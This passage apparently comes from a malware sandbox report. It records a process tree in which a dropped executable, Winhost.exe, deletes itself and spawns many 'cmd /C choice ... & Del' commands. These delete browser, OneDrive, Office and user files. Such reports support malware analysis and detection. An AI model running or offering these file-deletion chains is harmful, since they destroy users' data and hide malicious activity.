C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\48.png"2⤵PID:7848
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14600
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\64.png"2⤵PID:7868
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14520
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\96.png"2⤵PID:7888
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14952
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\128.png"2⤵PID:7924
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15260
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\192.png"2⤵PID:7952
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14576
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\256.png"2⤵PID:7964
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13696
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\32.png"2⤵PID:7988
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14748
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\48.png"2⤵PID:8004
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14292
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\64.png"2⤵PID:8016
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15284
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\96.png"2⤵PID:8028
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:10944
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\128.png"2⤵PID:8048
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14420
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\192.png"2⤵PID:8076
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13936
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\256.png"2⤵PID:8096
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15468
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\32.png"2⤵PID:8112
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13624
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\48.png"2⤵PID:8136
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:15324
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\64.png"2⤵PID:8156
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13140
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\96.png"2⤵PID:8168
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:14376
-
-
-
C:\Users\Admin\AppData\Local\Temp\Winhost.exe"C:\Users\Admin\AppData\Local\Temp\Winhost.exe"2⤵
- Deletes itself
- Executes dropped EXE
PID:9012 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x64.log-MSI_vc_red.msi.txt"3⤵PID:16564
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3604
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x64.log.html"3⤵PID:16580
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3476
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x86.log-MSI_vc_red.msi.txt"3⤵PID:16596
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:11852
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2010_x86.log.html"3⤵PID:16612
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13132
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log"3⤵PID:16628
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2444
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log"3⤵PID:16644
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:9624
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x86_0_vcRuntimeMinimum_x86.log"3⤵PID:16660
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2300
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2012_x86_1_vcRuntimeAdditional_x86.log"3⤵PID:16676
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:10496
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log"3⤵PID:16692
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13144
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log"3⤵PID:16708
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:7972
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x86_000_vcRuntimeMinimum_x86.log"3⤵PID:16724
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13328
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2013_x86_001_vcRuntimeAdditional_x86.log"3⤵PID:16740
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13604
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x64_000_vcRuntimeMinimum_x64.log"3⤵PID:16756
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:9324
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x64_001_vcRuntimeAdditional_x64.log"3⤵PID:16772
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12696
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x86_000_vcRuntimeMinimum_x86.log"3⤵PID:16788
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3668
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\vcredist2022_x86_001_vcRuntimeAdditional_x86.log"3⤵PID:16804
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12844
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Desktop.lnk"3⤵PID:16952
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15388
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Downloads.lnk"3⤵PID:16980
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:22712
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\MountGet.jpg"3⤵PID:17004
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13260
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1714145728.txt"3⤵PID:17024
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:11276
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt"3⤵PID:17040
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12868
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI48DA.txt"3⤵PID:17068
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15516
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI48F4.txt"3⤵PID:17084
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:10544
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI48DA.txt"3⤵PID:17104
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15616
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI48F4.txt"3⤵PID:17124
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14704
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\jawshtml.html"3⤵PID:17148
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:24408
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20240426_153151384.html"3⤵PID:17172
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13168
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt"3⤵PID:17188
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13100
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.VisualElementsManifest.xml"3⤵PID:17204
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:9336
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt"3⤵PID:17224
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:11272
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt"3⤵PID:17244
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14192
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml"3⤵PID:17268
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:11648
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml"3⤵PID:17284
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13108
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\office2016setup.exe_Rules.xml"3⤵PID:17300
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13084
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml"3⤵PID:17316
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14300
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml"3⤵PID:17332
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12952
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml"3⤵PID:17348
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:16024
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\alertIcon.png"3⤵PID:17364
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12148
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppBlue.png"3⤵PID:17380
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2568
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorBlue.png"3⤵PID:17396
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13232
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorWhite.png"3⤵PID:16704
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:24400
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppWhite.png"3⤵PID:16752
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13116
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AutoPlayOptIn.png"3⤵PID:16576
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:10944
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppBlue.png"3⤵PID:17424
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:5704
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppWhite.png"3⤵PID:17452
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12892
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Error.png"3⤵PID:17468
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4476
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ErrorPage.html"3⤵PID:17484
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:18572
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMHeroToast.png"3⤵PID:17504
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:9872
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMLockedFileToast.png"3⤵PID:17524
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:9308
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMScanExclusionToast.png"3⤵PID:17540
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3268
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LoadingPage.html"3⤵PID:17556
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14536
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\OneDriveLogo.png"3⤵PID:17576
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13136
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaCritical.png"3⤵PID:17604
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2552
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaError.png"3⤵PID:17632
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13756
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaNearing.png"3⤵PID:17652
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:7408
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\TestSharePage.html"3⤵PID:17680
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2596
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt"3⤵PID:17700
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13916
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Warning.png"3⤵PID:17720
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4240
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-100.png"3⤵PID:17748
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:988
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-125.png"3⤵PID:17760
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:9628
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-150.png"3⤵PID:17772
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:772
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-200.png"3⤵PID:17784
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4900
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-400.png"3⤵PID:17796
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15364
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-100.png"3⤵PID:17808
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:5072
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-125.png"3⤵PID:17820
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12536
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-150.png"3⤵PID:17832
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:11132
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-200.png"3⤵PID:17844
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:10596
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-400.png"3⤵PID:17864
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3256
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-100.png"3⤵PID:17892
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2072
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-125.png"3⤵PID:17904
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3116
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-150.png"3⤵PID:17920
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14768
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-200.png"3⤵PID:17932
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:1656
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-400.png"3⤵PID:17944
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13900
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-100.png"3⤵PID:17956
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3836
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-125.png"3⤵PID:17968
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4592
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-150.png"3⤵PID:17980
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13880
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-200.png"3⤵PID:17992
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:9572
-
-
-
